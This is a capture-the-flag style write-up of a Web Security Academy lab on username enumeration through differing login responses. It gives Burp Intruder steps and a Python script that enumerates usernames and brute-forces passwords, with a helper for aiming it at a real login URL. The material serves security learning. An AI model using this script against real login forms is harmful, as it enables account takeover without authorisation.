Authentication
Lab: Username enumeration via different responses
Hola 👋, welcome back! Here is my write-up on Username Enumeration via Different Responses on Web Security Academy, where I will go through how I approached it. This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password.
End Goal:
- Solve the lab, enumerate a valid username, brute-force the user’s password
- Then access the account page.
Username enumeration
Username enumeration is when an attacker can observe differences in the website's behaviour (an error message, a status code, a response length, or even response time) to tell whether a given username is valid. The login form acts as an oracle: one message for an unknown username, a different one for a known username with a wrong password.
Testing for vulnerabilities
We are given wordlists of candidate usernames and passwords:
- After opening the lab, let's look at the web app's features and functionality to see what kinds of vulnerabilities to look for. It is a blog site 😎
- Let's go to the login page, submit an invalid username and password, and see whether we get an 'Invalid username' message.
- In Burp, go to Proxy > HTTP history tab and find the POST /login request. Send it to the Repeater tab so we can see it clearly there.
- Highlight the value of the username parameter in the request and send it to Burp Intruder. In Burp Intruder, go to the Positions tab. The username parameter is automatically set as a payload position, indicated by two § symbols. Set the attack type to Sniper.
- Next, go to the Payloads tab and make sure the Simple list payload type is selected. Under Payload settings, paste the list of candidate usernames, then click Start attack.
- When the attack is complete, on the Results tab, check the Length column. Notice that one of the entries is longer than the others. Compare the response to this payload with the other responses. Notice that the other responses contain the message ‘Invalid username,’ but this response says ‘Incorrect password,’ i.e., we now know the username.
- So, let’s close the attack and go back to the Positions tab. Click Clear, then change the value of the username parameter to the username we found. Add a payload position to the password parameter.
- On the Payloads tab, clear the list of usernames and replace it with the list of candidate passwords. Then click Start attack.
- When the attack is finished, look at the Status column. Every request received a 200 response except for one, which received a 302. A redirect after a POST to /login is the behaviour of a successful login (the app sends the browser on to the account page), so that payload is the password.
- Now that we know the username and password, let's log in to access the account page and solve the lab.
- Note: the username and password you find may differ from mine, since the valid credentials are not predictable.
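The same two-stage attack can be scripted instead of clicked through in Intruder. The code below is an added example, not part of the original write-up or of PortSwigger's lab material. Stage one sends every candidate username with a dummy password and groups the responses by status code and body length; the one username whose response does not match the common signature is the valid one (the 'Incorrect password' body differs in length from the 'Invalid username' body). Stage two sends every candidate password for that username and stops at the first redirect. The `fake_login` function, the `VALID_USER` / `VALID_PASS` values and the wordlists are constructed stand-ins for the lab so the script runs offline; `make_http_sender` is an assumed helper that would point the same logic at a real `POST /login` endpoint, and the parameter names `username` and `password` are taken from the lab's form.

```python
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from typing import Callable, Iterable, List, Optional, Tuple

# A login attempt returns (HTTP status code, response body text).
Response = Tuple[int, str]
SendLogin = Callable[[str, str], Response]


def enumerate_usernames(send: SendLogin, usernames: Iterable[str]) -> List[str]:
    """Stage one: find usernames whose response differs from the common one.

    Every candidate is sent with the same dummy password. Responses are
    reduced to a (status, body length) signature; the most common signature
    is the 'Invalid username' case, and any outlier is a valid username.
    """
    signatures = {}
    for user in usernames:
        status, body = send(user, "not-the-password")
        signatures[user] = (status, len(body))
    common, _ = Counter(signatures.values()).most_common(1)[0]
    return [user for user, sig in signatures.items() if sig != common]


def bruteforce_password(send: SendLogin, username: str,
                        passwords: Iterable[str]) -> Optional[str]:
    """Stage two: the first password that produces a redirect is correct.

    A successful login answers the POST with a 3xx to the account page,
    while every failed attempt re-renders the form with a 200.
    """
    for password in passwords:
        status, _ = send(username, password)
        if status in (301, 302, 303, 307):
            return password
    return None


# Constructed stand-in for the lab's POST /login so the example runs offline.
# VALID_USER and VALID_PASS are made up; they are not the lab's real credentials.
VALID_USER = "alice"
VALID_PASS = "s3cret-demo"


def fake_login(username: str, password: str) -> Response:
    if username != VALID_USER:
        return 200, "<p class=is-warning>Invalid username</p>"
    if password != VALID_PASS:
        return 200, "<p class=is-warning>Incorrect password</p>"
    return 302, ""  # Location: /my-account in the real app


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so the 302 stays visible to the caller."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def make_http_sender(url: str) -> SendLogin:
    """Assumed helper: build a SendLogin that POSTs to a real login form."""
    opener = urllib.request.build_opener(_NoRedirect)

    def send(username: str, password: str) -> Response:
        data = urllib.parse.urlencode(
            {"username": username, "password": password}).encode()
        try:
            with opener.open(url, data=data, timeout=10) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            # A refused redirect surfaces as HTTPError with the 3xx code.
            return err.code, err.read().decode("utf-8", "replace")

    return send


if __name__ == "__main__":
    # Constructed wordlists standing in for the lab's candidate lists.
    users = ["admin", "root", "alice", "test", "guest"]
    passwords = ["123456", "password", "qwerty", "s3cret-demo", "letmein"]
    found_users = enumerate_usernames(fake_login, users)
    print("valid usernames:", found_users)
    for user in found_users:
        print(user, "->", bruteforce_password(fake_login, user, passwords))
```

The outlier test needs at least three candidates so the 'Invalid username' signature is unambiguously the majority; with a real target, swap `fake_login` for `make_http_sender("https://<lab-host>/login")` and keep the same two calls. If the site echoes the submitted username into the error page, lengths will vary per candidate and the signature should be computed on the body with the username stripped out instead.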
That’s all, friends. Thank you for reading up to this point. I would like to hear your feedback on anything not clear here. Here is my Twitter account @T3chnocr4t. Feel free to DM me if you have any issues with my write-up. Thanks!